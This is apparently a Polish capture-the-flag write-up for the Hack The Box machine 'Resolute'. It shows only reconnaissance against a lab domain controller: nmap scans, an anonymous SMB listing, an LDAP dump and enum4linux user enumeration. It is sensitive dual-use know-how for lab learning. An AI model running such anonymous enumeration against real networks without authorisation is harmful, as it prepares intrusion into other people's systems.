Resolute

Nmap

nmap -sC -sV -p- -T5 -Pn 10.10.10.169
PORT      STATE SERVICE      REASON          VERSION
53/tcp    open  domain?      syn-ack ttl 127
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-05-13 19:21:47Z)
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?    syn-ack ttl 127
593/tcp   open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped   syn-ack ttl 127
3268/tcp  open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped   syn-ack ttl 127
5985/tcp  open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       syn-ack ttl 127 .NET Message Framing
47001/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49685/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49712/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
55597/tcp open  unknown      syn-ack ttl 127
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/13%Time=5EBC4666%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h30m19s, deviation: 4h02m32s, median: 10m17s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2020-05-13T12:22:41-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-05-13T19:22:40
|_  start_date: 2020-05-13T17:05:59

User

Jest sporo portów otwartych, oraz informacje na temat domeny.
Możemy zacząć sprawdzenie od Samby
smbclient -L 10.10.10.169
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

Kolejnym serwisem wartym sprawdzenia jest LDAP. Można to zrobić ldapsearch’em, ale składnia jest trochę nie wygodna. Można spróbować skryptem nmap’a.

nmap -p 389 --script ldap-search 10.10.10.169
PORT    STATE SERVICE REASON
389/tcp open  ldap    syn-ack ttl 127
| ldap-search: 
|   Context: DC=megabank,DC=local
|     dn: DC=megabank,DC=local
|         objectClass: top
|         objectClass: domain
|         objectClass: domainDNS
|         distinguishedName: DC=megabank,DC=local
|         instanceType: 5
|         whenCreated: 2019/09/25 13:28:22 UTC
|         whenChanged: 2020/05/13 19:31:59 UTC
|         subRefs: DC=ForestDnsZones,DC=megabank,DC=local
|         subRefs: DC=DomainDnsZones,DC=megabank,DC=local
|         subRefs: CN=Configuration,DC=megabank,DC=local
|         uSNCreated: 4099
|         \x19\x9A\xF2\xBC
|         uSNChanged: 147500
|         name: megabank
|         objectGUID: b4e0e946-e7cb-b742-8fa0-5c4cec2fe5aa
|         replUpToDateVector: \x02\x00\x00\x00\x00\x00\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00;\xFE\xC7\x0EMO\x9F@\x81\xB6~\xC4\x91\xD3R\x8C\x1A\xC0\x01\x00\x00\x00\x00\x00\x0Cs\xF7\x13\x03\x00\x00\x00\xC2\x1D)\x1D\xC8\x1B\xD9G\xA2\xBCRK\xE1\x0F\x10d\x08\xA0\x00\x00\x00\x00\x00\x00\x115\x9F\x13\x03\x00\x00\x00p\x11cD\x9C\x9F\xC9N\xA6k\<\xDE\xBB\xAB|\x1C\xE0\x01\x00\x00\x00\x00\x00F{\xF7\x13\x03\x00\x00\x00\xAA8\x88adCkM\xB6\xD63\x9EGMk\xC8\x07\x90\x00\x00\x00\x00\x00\x00Z0\x9F\x13\x03\x00\x00\x00\x05\xA2\xB2b\xFB)\x86A\xB05\xFD\xBE\x97\xF4\xCEq	\xB0\x00\x00\x00\x00\x00\x00\xD07\x9F\x13\x03\x00\x00\x00`\x9D\x0Ee\xB3T\xBDE\xB4g\x88\x07\x05\xFCI\xE1\x05p\x00\x00\x00\x00\x00\x00< \x9F\x13\x03\x00\x00\x00\xD9
|         cjy\xA3\xC2I\x89d\xE1om\x86\xB0Y\x1F\x10\x02\x00\x00\x00\x00\x00\xF1.\xF8\x13\x03\x00\x00\x0068\xC9\x82\x1E\xBD\xD2N\x92\x1CL\xAF\xF2=\xC6o\x0C\xE0\x00\x00\x00\x00\x00\x00@\x1F\xE6\x13\x03\x00\x00\x00\x11:\x85\x83#\x98\xDAJ\xAA\x83\xE6\xF7%{w\xC1\x18\xA0\x01\x00\x00\x00\x00\x00
|         i\xF7\x13\x03\x00\x00\x00\xD0\xBBK\x8B\xF5\xB5\xD5D\xBE\xF9\xD7\x92\xCEz?;\x1B\xD0\x01\x00\x00\x00\x00\x00vw\xF7\x13\x03\x00\x00\x00
|         n\xF7\x13\x03\x00\x00\x00%}:\xF7\xE0\xF6\xEFM\xB2\xE2\xDD\x80.\xF0*\xB3\x17\x90\x01\x00\x00\x00\x00\x00\xBB`\xF7\x13\x03\x00\x00\x00\xF90\xC0\xFF\x9Df\xB6K\x939WR\x81\xC5P\xA6\x1E\x00\x02\x00\x00\x00\x00\x00\x07\x1D\xF8\x13\x03\x00\x00\x00
|         creationTime: 132338719195684370
|         forceLogoff: -9223372036854775808
|         lockoutDuration: -18000000000
|         lockOutObservationWindow: -18000000000
|         lockoutThreshold: 0
|         maxPwdAge: -9223372036854775808
|         minPwdAge: -864000000000
|         minPwdLength: 7
|         modifiedCountAtLastProm: 0
|         nextRid: 1000
|         pwdProperties: 0
|         pwdHistoryLength: 24
|         objectSid: 1-5-21-1392959593-3013219662-3596683436
|         serverState: 1
|         uASCompat: 1
|         modifiedCount: 1
|         auditingPolicy: \x00\x01
|         nTMixedDomain: 0
|         rIDManagerReference: CN=RID Manager$,CN=System,DC=megabank,DC=local
|         fSMORoleOwner: CN=NTDS Settings,CN=RESOLUTE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=megabank,DC=local
|         systemFlags: -1946157056
|         wellKnownObjects: B:32:6227F0AF1FC2410D8E3BB10615BB5B0F:CN=NTDS Quotas,DC=megabank,DC=local
|         wellKnownObjects: B:32:F4BE92A4C777485E878E9421D53087DB:CN=Microsoft,CN=Program Data,DC=megabank,DC=local
|         wellKnownObjects: B:32:09460C08AE1E4A4EA0F64AEE7DAA1E5A:CN=Program Data,DC=megabank,DC=local
|         wellKnownObjects: B:32:22B70C67D56E4EFB91E9300FCA3DC1AA:CN=ForeignSecurityPrincipals,DC=megabank,DC=local
|         wellKnownObjects: B:32:18E2EA80684F11D2B9AA00C04F79F805:CN=Deleted Objects,DC=megabank,DC=local
|         wellKnownObjects: B:32:2FBAC1870ADE11D297C400C04FD8D5CD:CN=Infrastructure,DC=megabank,DC=local
|         wellKnownObjects: B:32:AB8153B7768811D1ADED00C04FD8D5CD:CN=LostAndFound,DC=megabank,DC=local
|         wellKnownObjects: B:32:AB1D30F3768811D1ADED00C04FD8D5CD:CN=System,DC=megabank,DC=local
|         wellKnownObjects: B:32:A361B2FFFFD211D1AA4B00C04FD7D83A:OU=Domain Controllers,DC=megabank,DC=local
|         wellKnownObjects: B:32:AA312825768811D1ADED00C04FD8D5CD:CN=Computers,DC=megabank,DC=local
|         wellKnownObjects: B:32:A9D1CA15768811D1ADED00C04FD8D5CD:CN=Users,DC=megabank,DC=local
|         objectCategory: CN=Domain-DNS,CN=Schema,CN=Configuration,DC=megabank,DC=local
|         isCriticalSystemObject: TRUE
|         gPLink: [LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=megabank,DC=local;0]
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|         otherWellKnownObjects: B:32:683A24E2E8164BD3AF86AC3C2CF3F981:CN=Keys,DC=megabank,DC=local
|         otherWellKnownObjects: B:32:1EB93889E40C45DF9F0C64D23BBB6237:CN=Managed Service Accounts,DC=megabank,DC=local
|         masteredBy: CN=NTDS Settings,CN=RESOLUTE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=megabank,DC=local
|         ms-DS-MachineAccountQuota: 10
|         msDS-Behavior-Version: 7
|         msDS-PerUserTrustQuota: 1
|         msDS-AllUsersTrustQuota: 1000
|         msDS-PerUserTrustTombstonesQuota: 10
|         msDs-masteredBy: CN=NTDS Settings,CN=RESOLUTE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=megabank,DC=local
|         msDS-IsDomainFor: CN=NTDS Settings,CN=RESOLUTE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=megabank,DC=local
|         msDS-NcType: 0
|         msDS-ExpirePasswordsOnSmartCardOnlyAccounts: TRUE
|         dc: megabank
|     dn: CN=Users,DC=megabank,DC=local
|         objectClass: top
|         objectClass: container
|         cn: Users
|         description: Default container for upgraded user accounts
|         distinguishedName: CN=Users,DC=megabank,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/25 13:28:31 UTC
|         whenChanged: 2019/09/25 13:28:31 UTC
|         uSNCreated: 5888
|         uSNChanged: 5888
|         showInAdvancedViewOnly: FALSE
|         name: Users
|         objectGUID: d0ed52a-e080-9841-81d6-302cdfab7cf
|         systemFlags: -1946157056
|         objectCategory: CN=Container,CN=Schema,CN=Configuration,DC=megabank,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2019/09/27 22:10:48 UTC
|         dSCorePropagationData: 2019/09/27 10:52:19 UTC
|         dSCorePropagationData: 2019/09/26 12:35:01 UTC
|         dSCorePropagationData: 2019/09/25 13:29:12 UTC
|         dSCorePropagationData: 1601/07/14 04:24:33 UTC
|     dn: CN=Computers,DC=megabank,DC=local
|         objectClass: top
|         objectClass: container
|         cn: Computers
|         description: Default container for upgraded computer accounts
|         distinguishedName: CN=Computers,DC=megabank,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/25 13:28:31 UTC
|         whenChanged: 2019/09/25 13:28:31 UTC
|         uSNCreated: 5889
|         uSNChanged: 5889
|         showInAdvancedViewOnly: FALSE
|         name: Computers
|         objectGUID: 41e2c5ff-1512-be45-9ca1-488358ad588
|         systemFlags: -1946157056
|         objectCategory: CN=Container,CN=Schema,CN=Configuration,DC=megabank,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2019/09/27 22:10:48 UTC
|         dSCorePropagationData: 2019/09/27 10:52:18 UTC
|         dSCorePropagationData: 2019/09/26 12:35:01 UTC
|         dSCorePropagationData: 2019/09/25 13:29:12 UTC
|         dSCorePropagationData: 1601/07/14 04:24:33 UTC
|     dn: OU=Domain Controllers,DC=megabank,DC=local
|         objectClass: top
|         objectClass: organizationalUnit
|         ou: Domain Controllers
|         description: Default container for domain controllers
|         distinguishedName: OU=Domain Controllers,DC=megabank,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/25 13:28:31 UTC
|         whenChanged: 2019/09/25 13:28:31 UTC
|         uSNCreated: 6031
|         uSNChanged: 6031
|         showInAdvancedViewOnly: FALSE
|         name: Domain Controllers
|         objectGUID: 12316bd2-27fe-3a41-90d0-471b6f5e7497
|         systemFlags: -1946157056
|         objectCategory: CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=megabank,DC=local
|         isCriticalSystemObject: TRUE
|         gPLink: [LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=megabank,DC=local;0]
|         dSCorePropagationData: 2019/09/27 22:10:48 UTC
|         dSCorePropagationData: 2019/09/27 10:52:18 UTC
|         dSCorePropagationData: 2019/09/26 12:35:01 UTC
|         dSCorePropagationData: 2019/09/25 13:29:12 UTC
|         dSCorePropagationData: 1601/07/14 04:24:33 UTC
|     dn: CN=System,DC=megabank,DC=local
|         objectClass: top
|         objectClass: container
|         cn: System
|         description: Builtin system settings
|         distinguishedName: CN=System,DC=megabank,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/25 13:28:31 UTC
|         whenChanged: 2019/09/25 13:28:31 UTC
|         uSNCreated: 5890
|         uSNChanged: 5890
|         showInAdvancedViewOnly: TRUE
|         name: System
|         objectGUID: 40f9d21f-49e-f54f-bf31-ad83fbc454
|         systemFlags: -1946157056
|         objectCategory: CN=Container,CN=Schema,CN=Configuration,DC=megabank,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2019/09/27 22:10:48 UTC
|         dSCorePropagationData: 2019/09/27 10:52:18 UTC
|         dSCorePropagationData: 2019/09/26 12:35:01 UTC
|         dSCorePropagationData: 2019/09/25 13:29:12 UTC
|         dSCorePropagationData: 1601/07/14 04:24:33 UTC
|     dn: CN=LostAndFound,DC=megabank,DC=local
|         objectClass: top
|         objectClass: lostAndFound
|         cn: LostAndFound
|         description: Default container for orphaned objects
|         distinguishedName: CN=LostAndFound,DC=megabank,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/25 13:28:31 UTC
|         whenChanged: 2019/09/25 13:28:31 UTC
|         uSNCreated: 5886
|         uSNChanged: 5886
|         showInAdvancedViewOnly: TRUE
|         name: LostAndFound
|         objectGUID: f0581973-33c1-5a4b-aeff-69c8231b4c20
|         systemFlags: -1946157056
|         objectCategory: CN=Lost-And-Found,CN=Schema,CN=Configuration,DC=megabank,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2019/09/27 22:10:48 UTC
|         dSCorePropagationData: 2019/09/27 10:52:18 UTC
|         dSCorePropagationData: 2019/09/26 12:35:01 UTC
|         dSCorePropagationData: 2019/09/25 13:29:12 UTC
|         dSCorePropagationData: 1601/07/14 04:24:33 UTC
|     dn: CN=Infrastructure,DC=megabank,DC=local
|         objectClass: top
|         objectClass: infrastructureUpdate
|         cn: Infrastructure
|         distinguishedName: CN=Infrastructure,DC=megabank,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/25 13:28:31 UTC
|         whenChanged: 2019/09/25 13:28:31 UTC
|         uSNCreated: 6032
|         uSNChanged: 6032
|         showInAdvancedViewOnly: TRUE
|         name: Infrastructure
|         objectGUID: 261c42dd-8a5-8848-9933-acc8d9b31e21
|         fSMORoleOwner: CN=NTDS Settings,CN=RESOLUTE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=megabank,DC=local
|         systemFlags: -1946157056
|         objectCategory: CN=Infrastructure-Update,CN=Schema,CN=Configuration,DC=megabank,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2019/09/27 22:10:48 UTC
|         dSCorePropagationData: 2019/09/27 10:52:18 UTC
|         dSCorePropagationData: 2019/09/26 12:35:01 UTC
|         dSCorePropagationData: 2019/09/25 13:29:12 UTC
|         dSCorePropagationData: 1601/07/14 04:24:33 UTC
|     dn: CN=ForeignSecurityPrincipals,DC=megabank,DC=local
|         objectClass: top
|         objectClass: container
|         cn: ForeignSecurityPrincipals
|         description: Default container for security identifiers (SIDs) associated with objects from external, trusted domains
|         distinguishedName: CN=ForeignSecurityPrincipals,DC=megabank,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/25 13:28:31 UTC
|         whenChanged: 2019/09/25 13:28:31 UTC
|         uSNCreated: 6033
|         uSNChanged: 6033
|         showInAdvancedViewOnly: FALSE
|         name: ForeignSecurityPrincipals
|         objectGUID: 34d72428-e5c-7b46-9f90-963f6f91eeb
|         systemFlags: -1946157056
|         objectCategory: CN=Container,CN=Schema,CN=Configuration,DC=megabank,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2019/09/27 22:10:48 UTC
|         dSCorePropagationData: 2019/09/27 10:52:18 UTC
|         dSCorePropagationData: 2019/09/26 12:35:01 UTC
|         dSCorePropagationData: 2019/09/25 13:29:12 UTC
|         dSCorePropagationData: 1601/07/14 04:24:33 UTC
|     dn: CN=Program Data,DC=megabank,DC=local
|         objectClass: top
|         objectClass: container
|         cn: Program Data
|         description: Default location for storage of application data.
|         distinguishedName: CN=Program Data,DC=megabank,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/25 13:28:31 UTC
|         whenChanged: 2019/09/25 13:28:31 UTC
|         uSNCreated: 6034
|         uSNChanged: 6034
|         showInAdvancedViewOnly: TRUE
|         name: Program Data
|         objectGUID: ced5275f-fd9-5f43-b6e-6938b4e19a81
|         objectCategory: CN=Container,CN=Schema,CN=Configuration,DC=megabank,DC=local
|         dSCorePropagationData: 2019/09/27 22:10:48 UTC
|         dSCorePropagationData: 2019/09/27 10:52:18 UTC
|         dSCorePropagationData: 2019/09/26 12:35:01 UTC
|         dSCorePropagationData: 2019/09/25 13:29:12 UTC
|         dSCorePropagationData: 1601/07/14 04:24:33 UTC
|     dn: CN=Microsoft,CN=Program Data,DC=megabank,DC=local
|         objectClass: top
|         objectClass: container
|         cn: Microsoft
|         description: Default location for storage of Microsoft application data.
|         distinguishedName: CN=Microsoft,CN=Program Data,DC=megabank,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/25 13:28:31 UTC
|         whenChanged: 2019/09/25 13:28:31 UTC
|         uSNCreated: 6035
|         uSNChanged: 6035
|         showInAdvancedViewOnly: TRUE
|         name: Microsoft
|         objectGUID: 30ca5855-6b3e-3740-a918-ea7e5ecfffd5
|         objectCategory: CN=Container,CN=Schema,CN=Configuration,DC=megabank,DC=local
|         dSCorePropagationData: 2019/09/27 22:10:48 UTC
|         dSCorePropagationData: 2019/09/27 10:52:18 UTC
|         dSCorePropagationData: 2019/09/25 13:29:12 UTC
|         dSCorePropagationData: 1601/01/01 18:16:33 UTC
|     dn: CN=NTDS Quotas,DC=megabank,DC=local
|         objectClass: top
|         objectClass: msDS-QuotaContainer
|         cn: NTDS Quotas
|         description: Quota specifications container
|         distinguishedName: CN=NTDS Quotas,DC=megabank,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/25 13:28:31 UTC
|         whenChanged: 2019/09/25 13:28:31 UTC
|         uSNCreated: 6036
|         uSNChanged: 6036
|         showInAdvancedViewOnly: TRUE
|         name: NTDS Quotas
|         objectGUID: 91fa8980-4347-7647-936a-1b5967503a9b
|         systemFlags: -2147483648
|         objectCategory: CN=ms-DS-Quota-Container,CN=Schema,CN=Configuration,DC=megabank,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2019/09/27 22:10:48 UTC
|         dSCorePropagationData: 2019/09/27 10:52:18 UTC
|         dSCorePropagationData: 2019/09/26 12:35:01 UTC
|         dSCorePropagationData: 2019/09/25 13:29:12 UTC
|         dSCorePropagationData: 1601/07/14 04:24:33 UTC
|         msDS-TombstoneQuotaFactor: 100
|     dn: CN=Managed Service Accounts,DC=megabank,DC=local
|         objectClass: top
|         objectClass: container
|         cn: Managed Service Accounts
|         description: Default container for managed service accounts
|         distinguishedName: CN=Managed Service Accounts,DC=megabank,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/25 13:28:31 UTC
|         whenChanged: 2019/09/25 13:28:31 UTC
|         uSNCreated: 6037
|         uSNChanged: 6037
|         showInAdvancedViewOnly: FALSE
|         name: Managed Service Accounts
|         objectGUID: 5ca0ec93-8f9d-5d42-80fe-8e5dd33415ce
|         objectCategory: CN=Container,CN=Schema,CN=Configuration,DC=megabank,DC=local
|         dSCorePropagationData: 2019/09/27 22:10:48 UTC
|         dSCorePropagationData: 2019/09/27 10:52:18 UTC
|         dSCorePropagationData: 2019/09/26 12:35:01 UTC
|         dSCorePropagationData: 2019/09/25 13:29:12 UTC
|         dSCorePropagationData: 1601/07/14 04:24:33 UTC
|     dn: CN=Keys,DC=megabank,DC=local
|     dn: CN=WinsockServices,CN=System,DC=megabank,DC=local
|         objectClass: top
|         objectClass: container
|         cn: WinsockServices
|         distinguishedName: CN=WinsockServices,CN=System,DC=megabank,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/25 13:28:31 UTC
|         whenChanged: 2019/09/25 13:28:31 UTC
|         uSNCreated: 5891
|         uSNChanged: 5891
|         showInAdvancedViewOnly: TRUE
|         name: WinsockServices
|         objectGUID: 5eca97f7-852f-3a45-bdcf-3e80e3385d69
|         objectCategory: CN=Container,CN=Schema,CN=Configuration,DC=megabank,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2019/09/27 22:10:48 UTC
|         dSCorePropagationData: 2019/09/27 10:52:19 UTC
|         dSCorePropagationData: 2019/09/25 13:29:12 UTC
|         dSCorePropagationData: 1601/01/01 18:16:33 UTC
|     dn: CN=RpcServices,CN=System,DC=megabank,DC=local
|         objectClass: top
|         objectClass: container
|         objectClass: rpcContainer
|         cn: RpcServices
|         distinguishedName: CN=RpcServices,CN=System,DC=megabank,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/25 13:28:31 UTC
|         whenChanged: 2019/09/25 13:28:31 UTC
|         uSNCreated: 5892
|         uSNChanged: 5892
|         showInAdvancedViewOnly: TRUE
|         name: RpcServices
|         objectGUID: c1e4561a-408c-c84e-b995-70bb8b17da5
|         systemFlags: -1946157056
|         objectCategory: CN=Rpc-Container,CN=Schema,CN=Configuration,DC=megabank,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2019/09/27 22:10:48 UTC
|         dSCorePropagationData: 2019/09/27 10:52:19 UTC
|         dSCorePropagationData: 2019/09/25 13:29:12 UTC
|         dSCorePropagationData: 1601/01/01 18:16:33 UTC
|     dn: CN=FileLinks,CN=System,DC=megabank,DC=local
|         objectClass: top
|         objectClass: fileLinkTracking
|         cn: FileLinks
|         distinguishedName: CN=FileLinks,CN=System,DC=megabank,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/25 13:28:31 UTC
|         whenChanged: 2019/09/25 13:28:31 UTC
|         uSNCreated: 5893
|         uSNChanged: 5893
|         showInAdvancedViewOnly: TRUE
|         name: FileLinks
|         objectGUID: 8c677be4-1aaf-e74b-b4b4-a38dc418ead
|         systemFlags: -1946157056
|         objectCategory: CN=File-Link-Tracking,CN=Schema,CN=Configuration,DC=megabank,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2019/09/27 22:10:48 UTC
|         dSCorePropagationData: 2019/09/27 10:52:19 UTC
|         dSCorePropagationData: 2019/09/25 13:29:12 UTC
|         dSCorePropagationData: 1601/01/01 18:16:33 UTC
|     dn: CN=VolumeTable,CN=FileLinks,CN=System,DC=megabank,DC=local
|     dn: CN=ObjectMoveTable,CN=FileLinks,CN=System,DC=megabank,DC=local
|         objectClass: top
|         objectClass: fileLinkTracking
|         objectClass: linkTrackObjectMoveTable
|         cn: ObjectMoveTable
|         distinguishedName: CN=ObjectMoveTable,CN=FileLinks,CN=System,DC=megabank,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/25 13:28:31 UTC
|         whenChanged: 2019/09/25 13:28:31 UTC
|         uSNCreated: 5895
|         uSNChanged: 5895
|         showInAdvancedViewOnly: TRUE
|         name: ObjectMoveTable
|         objectGUID: e16ba9f4-c9f-449-88d8-65e65e9cfdb1
|         systemFlags: -1946157056
|         objectCategory: CN=Link-Track-Object-Move-Table,CN=Schema,CN=Configuration,DC=megabank,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2019/09/27 22:10:48 UTC
|         dSCorePropagationData: 2019/09/27 10:52:19 UTC
|         dSCorePropagationData: 2019/09/25 13:29:12 UTC
|         dSCorePropagationData: 1601/01/01 18:16:33 UTC
|     dn: CN=Default Domain Policy,CN=System,DC=megabank,DC=local
|         objectClass: top
|         objectClass: leaf
|         objectClass: domainPolicy
|         cn: Default Domain Policy
|         distinguishedName: CN=Default Domain Policy,CN=System,DC=megabank,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/25 13:28:31 UTC
|         whenChanged: 2019/09/25 13:28:31 UTC
|         uSNCreated: 5896
|         uSNChanged: 5896
|         showInAdvancedViewOnly: TRUE
|         name: Default Domain Policy
|         objectGUID: 1f79146-3c59-342-ae76-ff643dfce95
|         objectCategory: CN=Domain-Policy,CN=Schema,CN=Configuration,DC=megabank,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2019/09/27 22:10:48 UTC
|         dSCorePropagationData: 2019/09/27 10:52:18 UTC
|         dSCorePropagationData: 2019/09/25 13:29:12 UTC
|         dSCorePropagationData: 1601/01/01 18:16:33 UTC
|     dn: CN=AppCategories,CN=Default Domain Policy,CN=System,DC=megabank,DC=local
|         objectClass: top
|         objectClass: classStore
|         cn: AppCategories
|         distinguishedName: CN=AppCategories,CN=Default Domain Policy,CN=System,DC=megabank,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/25 13:28:31 UTC
|         whenChanged: 2019/09/25 13:28:31 UTC
|         uSNCreated: 5897
|         uSNChanged: 5897
|         showInAdvancedViewOnly: TRUE
|         name: AppCategories
|         objectGUID: 44976634-b987-744c-8d2e-866227fe20a2
|         objectCategory: CN=Class-Store,CN=Schema,CN=Configuration,DC=megabank,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2019/09/27 22:10:48 UTC
|         dSCorePropagationData: 2019/09/27 10:52:18 UTC
|         dSCorePropagationData: 2019/09/25 13:29:12 UTC
|         dSCorePropagationData: 1601/01/01 18:16:33 UTC
| 
| 
|_Result limited to 20 objects (see ldap.maxobjects)

Nmap done: 1 IP address (1 host up) scanned in 2.67 seconds

Dużo informacji i na tą chwilę żadna przydatna. Lecimy dalej z rozpoznaniem.

enum4linux 10.10.10.169
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed May 13 21:41:27 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.169
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ===================================== 
|    Session Check on 10.10.10.169    |
 ===================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.10.169 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name: 

 =========================================== 
|    Getting domain SID for 10.10.10.169    |
 =========================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436
[+] Host is part of a domain (not a workgroup)

 ====================================== 
|    OS information on 10.10.10.169    |
 ====================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.169 from smbclient: 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.10.169 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ============================= 
|    Users on 10.10.10.169    |
 ============================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail	Name: (null)	Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator	Name: (null)	Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela	Name: (null)	Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette	Name: (null)	Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika	Name: (null)	Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire	Name: (null)	Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude	Name: (null)	Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount	Name: (null)	Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia	Name: (null)	Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred	Name: (null)	Desc: (null)
